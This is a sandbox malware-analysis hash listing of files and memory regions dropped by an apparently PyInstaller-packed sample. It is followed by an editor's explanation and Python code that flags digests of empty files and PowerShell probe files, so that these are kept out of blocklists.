SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_hashlib.pyd
Filesize 64KB
MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_lzma.pyd
Filesize 156KB
MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_socket.pyd
Filesize 81KB
MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\base_library.zip
Filesize 1.3MB
MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\cryptography\hazmat\bindings\_rust.pyd
Filesize 6.9MB
MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\libcrypto-3.dll
Filesize 5.0MB
MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\python3.DLL
Filesize 66KB
MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\python312.dll
Filesize 6.6MB
MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\select.pyd
Filesize 29KB
MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191
-
C:\Users\Admin\AppData\Local\Temp\_MEI41122\unicodedata.pyd
Filesize 1.1MB
MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thizdt5p.wwk.ps1
Filesize 1B
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\Desktop\kill.jpg
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\Desktop\kill.jpg
Filesize 114KB
MD5 3c902b79ca8053d80fe381cc8fa495a2
SHA1 3f38f9a5cd03a889887a3c32d9642a3dc83c3e5a
SHA256 d7c4b9f94a23b899435abf8ee25f2f767b19c1c7ca3a46b7de5e8253a5fd00b0
SHA512 8c8b068e001090c7480e0ac28ce883683f6ee5d764a8502154c2f658fc6001f82a8de965cbcf38a320af89412cafe8e6cb96b8ef6771ff7d06ecf521f227fc6e
-
\Users\Admin\AppData\Local\Temp\_MEI41122\VCRUNTIME140.dll
Filesize 116KB
MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
\Users\Admin\AppData\Local\Temp\_MEI41122\_ctypes.pyd
Filesize 122KB
MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e
-
\Users\Admin\AppData\Local\Temp\_MEI41122\libffi-8.dll
Filesize 38KB
MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978
-
memory/2756-3422-0x00000208247F0000-0x00000208247F1000-memory.dmp
Filesize 4KB
-
memory/2756-279-0x000002081E120000-0x000002081E130000-memory.dmp
Filesize 64KB
-
memory/2756-7788-0x000002081B480000-0x000002081B481000-memory.dmp
Filesize 4KB
-
memory/2756-7784-0x000002081B4E0000-0x000002081B4E1000-memory.dmp
Filesize 4KB
-
memory/2756-7781-0x000002081D200000-0x000002081D202000-memory.dmp
Filesize 8KB
-
memory/2756-3423-0x0000020824800000-0x0000020824801000-memory.dmp
Filesize 4KB
-
memory/2756-263-0x000002081E020000-0x000002081E030000-memory.dmp
Filesize 64KB
-
memory/2756-298-0x000002081B490000-0x000002081B492000-memory.dmp
Filesize 8KB
-
memory/3024-7999-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7992-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7996-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7997-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7998-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7880-0x000001EF72B20000-0x000001EF72B40000-memory.dmp
Filesize 128KB
-
memory/3024-7994-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7930-0x000001EF75D80000-0x000001EF75E80000-memory.dmp
Filesize 1024KB
-
memory/3024-7993-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7995-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7988-0x000001EF611F0000-0x000001EF61200000-memory.dmp
Filesize 64KB
-
memory/3024-7901-0x000001EF72B80000-0x000001EF72BA0000-memory.dmp
Filesize 128KB
-
memory/3024-7799-0x000001EF620A0000-0x000001EF620C0000-memory.dmp
Filesize 128KB
-
memory/3024-7796-0x000001EF61A00000-0x000001EF61B00000-memory.dmp
Filesize 1024KB
-
memory/3024-7795-0x000001EF61A00000-0x000001EF61B00000-memory.dmp
Filesize 1024KB
-
memory/3024-7794-0x000001EF61A00000-0x000001EF61B00000-memory.dmp
Filesize 1024KB
-
memory/3024-7820-0x000001EF62220000-0x000001EF62240000-memory.dmp
Filesize 128KB
-
memory/4408-256-0x00007FFF42D80000-0x00007FFF4376C000-memory.dmp
Filesize 9.9MB
-
memory/4408-217-0x00000204AB1C0000-0x00000204AB1E2000-memory.dmp
Filesize 136KB
-
memory/4408-219-0x00007FFF42D80000-0x00007FFF4376C000-memory.dmp
Filesize 9.9MB
-
memory/4408-221-0x00000204AB4F0000-0x00000204AB566000-memory.dmp
Filesize 472KB
-
memory/4408-222-0x00007FFF42D80000-0x00007FFF4376C000-memory.dmp
Filesize 9.9MB
-
memory/4408-251-0x00007FFF42D80000-0x00007FFF4376C000-memory.dmp
Filesize 9.9MB
-
memory/4408-260-0x00007FFF42D80000-0x00007FFF4376C000-memory.dmp
Filesize 9.9MB
-
memory/4408-215-0x00007FFF42D83000-0x00007FFF42D84000-memory.dmp
Filesize 4KB
-
memory/4920-380-0x000001D06D420000-0x000001D06D422000-memory.dmp
Filesize 8KB
-
memory/4920-384-0x000001D06D500000-0x000001D06D502000-memory.dmp
Filesize 8KB
-
memory/4920-377-0x000001D06D3F0000-0x000001D06D3F2000-memory.dmp
Filesize 8KB
-
memory/4920-382-0x000001D06D440000-0x000001D06D442000-memory.dmp
Filesize 8KB
-
memory/5068-362-0x00000287EA100000-0x00000287EA200000-memory.dmp
Filesize 1024KB
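Two records in the Downloads list deserve a second look before any of these digests go into a blocklist. The first `kill.jpg` entry carries the MD5, SHA-1, SHA-256 and SHA-512 of zero-byte input (d41d8cd9…, da39a3ee…, e3b0c442…, cf83e135…), so it is the file hashed while still empty, before the 114KB image content was written; blocking those digests would match every empty file on every host. The 1-byte `__PSScriptPolicyTest_*.ps1` has the digests of the single character `1`, which is the probe file PowerShell writes at startup to test application-control script policy, not sample content. The Python below is an added example by the editor, not code from the report: it parses entries written in the `label value` form used above, validates digest lengths, and flags records whose digests match known trivial content. The three embedded records are transcribed from the list; the parser, the trivial-content table and the `triage` helper are the editor's.

```python
import hashlib
import re

# Constructed sample: three entries transcribed from the Downloads list in this
# report, as "label value" lines separated by "-" lines.
SAMPLE_REPORT = r"""
C:\Users\Admin\Desktop\kill.jpg
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\Desktop\kill.jpg
Filesize 114KB
MD5 3c902b79ca8053d80fe381cc8fa495a2
SHA1 3f38f9a5cd03a889887a3c32d9642a3dc83c3e5a
SHA256 d7c4b9f94a23b899435abf8ee25f2f767b19c1c7ca3a46b7de5e8253a5fd00b0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thizdt5p.wwk.ps1
Filesize 1B
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
"""

HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
LINE_RE = re.compile(r"(Filesize|MD5|SHA1|SHA256|SHA512)\s+(\S+)")


def parse_entries(text):
    """Turn 'path / label value ... / -' blocks into a list of dicts.
    A line that is not a known label starts a new entry (it is the path)."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":
            if cur is not None:
                entries.append(cur)
            cur = None
            continue
        m = LINE_RE.fullmatch(line)
        if m and cur is not None:
            label, value = m.groups()
            cur[label] = value if label == "Filesize" else value.lower()
        else:
            cur = {"path": line}
    if cur is not None:
        entries.append(cur)
    return entries


def digests(data: bytes):
    """All four digests the report lists, computed locally for comparison."""
    return {"MD5": hashlib.md5(data).hexdigest(),
            "SHA1": hashlib.sha1(data).hexdigest(),
            "SHA256": hashlib.sha256(data).hexdigest(),
            "SHA512": hashlib.sha512(data).hexdigest()}


# Content whose digests say nothing about the sample: an empty file, and the
# one-byte "1" PowerShell writes to probe script policy at startup.
KNOWN_TRIVIAL = {
    "empty file": digests(b""),
    "powershell script-policy probe": digests(b"1"),
}


def malformed_digests(entry):
    """Labels whose value is not lowercase hex of the expected length
    (a transcription or extraction error in the report)."""
    return [k for k, n in HEX_LEN.items()
            if k in entry and not re.fullmatch(rf"[0-9a-f]{{{n}}}", entry[k])]


def classify(entry):
    """Name the trivial content all of an entry's present digests match, or None."""
    present = [k for k in HEX_LEN if k in entry]
    if not present:
        return None
    for name, d in KNOWN_TRIVIAL.items():
        if all(entry[k] == d[k] for k in present):
            return name
    return None


def triage(text):
    """(path, classification) per entry; None means the digests are worth keeping."""
    return [(e["path"], classify(e)) for e in parse_entries(text)]


if __name__ == "__main__":
    for path, verdict in triage(SAMPLE_REPORT):
        print(verdict or "keep", path)
```

The empty-file and probe-file digests are recomputed with `hashlib` rather than hard-coded, so the check cannot drift from the real values; only the 114KB `kill.jpg` survives as a usable indicator. The same `classify` pass is worth running over any sandbox hash list before it is imported into a blocklist, since every sandbox that hashes on file creation will produce these placeholder records.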